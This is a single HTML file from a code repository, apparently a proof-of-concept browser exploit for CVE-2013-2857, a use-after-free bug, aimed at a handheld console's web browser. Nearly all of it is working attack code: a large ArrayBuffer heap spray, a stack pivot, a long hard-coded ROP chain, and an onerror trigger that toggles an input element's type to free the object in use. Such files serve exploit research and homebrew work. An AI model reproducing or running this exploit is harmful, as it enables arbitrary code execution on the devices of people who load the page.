-
Notifications
You must be signed in to change notification settings - Fork 4
/
index.html
63 lines (59 loc) · 5.27 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash
types=["checkbox","color","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"]
-->
<script>
function UaF3(a)
{
var bsize=0x2000000;
var p = new ArrayBuffer(bsize);
var payload = new Uint32Array(p);
payload[(0x1ba000+0x18)/4]=0x09300000;
payload[(0x1ba000)/4]=0x09300000;
payload[(0x1ba000+0x14c)/4]=0x00ac144c; //ldmdb r0!, {ip, sp, lr, pc} (stack pivot)
payload[(0x1ba000-0x4)/4]=0x001df60c; //POP_PC (pivot pc)
payload[(0x1ba000-0x8)/4]=0x44444444; //GARBAGE (lr)
payload[(0x1ba000-0xC)/4]=0x09310000; //ROP_ADDR (pivot sp)
var rop=[ /* Generated from: https://github.com/yellows8/3ds_browserhax_common */
0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x0100FFFF,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x00202A04,0x09320000,
0x00000004,0x00000000,0x00000000,0x00000000,0x00000000,0x00298304,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x00011000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00D1042C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x636D6473,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320004,
0x0000003A,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00318D30,0x0026276C,0x00000000,0x0027B150,0x001DF7F0,0x001DF7F0,0x09320000,0x0A000000,0x00000000,0x00800000,0x00000000,0x00000000,0x00000000,0x002634DC,0x00000001,
0x00000000,0x00000000,0x00000008,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000014,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00D1042C,0x0030C328,0x09320010,0x00640073,0x0063006D,0x002F003A,0x00720061,0x0031006D,0x00630031,0x0064006F,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,
0x0932002C,0x002E0065,0x00690062,0x0000006E,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,
0x09320040,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320040,0x00000001,0x00000000,0x00000000,
0x00000000,0x00000000,0x003222E4,0x0026276C,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320020,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x0030C44C,
0x0026276C,0x00000000,0x00296E64,0x09320000,0x0027B150,0x001DF60C,0x001F7A04,0x0027B150,0x001DF60C,0x001DCDD0,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x001EC780,
0x0027B150,0x001DF60C,0x001DF7F0,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0029DADC,0x0030C328,0x09320010,0x00000000,0x001F1FAC,0x00000000,
0x00000000,0x00000000,0x00000000,0x001EAAFC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x002A2498,0x0029DADC,0x003222E4,0x001EC780,0x001F1FDC,
0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,
0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x0030C44C,0x00327258,0x00298304,0x00000000,0x00000000,0x00000048,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,
0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x003E03D0,0x00000114,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,
0x001DF7F0,0x3A45C030,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x3A45D000,0x0063A738,0x00D11044,0x00D10BA4,
0x00D111B4,0x00D10BAC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C060,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,
0x0027B150,0x001DF7F0,0x001DF7F0,0x3A45D000,0x3B1336E0,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x002A2498,0x00000000,0x00000000,0x00000000,0x00000008,0x00000000,
0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3B9ACA00,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x002D8CD4,0x0027B150,0x001DF60C,0x001DF7F0,
0x09320000,0x01808080,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF7F0,0x001DF7F0,0x00202A04,0x09320000,0x00000004,0x00000000,0x00000000,
0x00000000,0x00000000,0x00298304,0x3A45C000,0x0FFF9000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x0055B6E0,0x70707070
]
for(var i=0; i < rop.length; i++) payload[(0x1ba000+0x10000+(i*4))/4]=rop[i];
for(var i=0;i<1000;i++){
var buf = new ArrayBuffer(0x18);
var bufView = new Uint32Array(buf);
bufView[0]=0x11131100;
bufView[1]=0x09300000; //r5
bufView[2]=0x39010018; //r6
bufView[3]=0x44161400;
bufView[4]=0xffffffff;
bufView[5]=0x66181600;
a.type="hidden";
}
}
</script>
<input type="image" onerror="UaF3(this);" src=""/>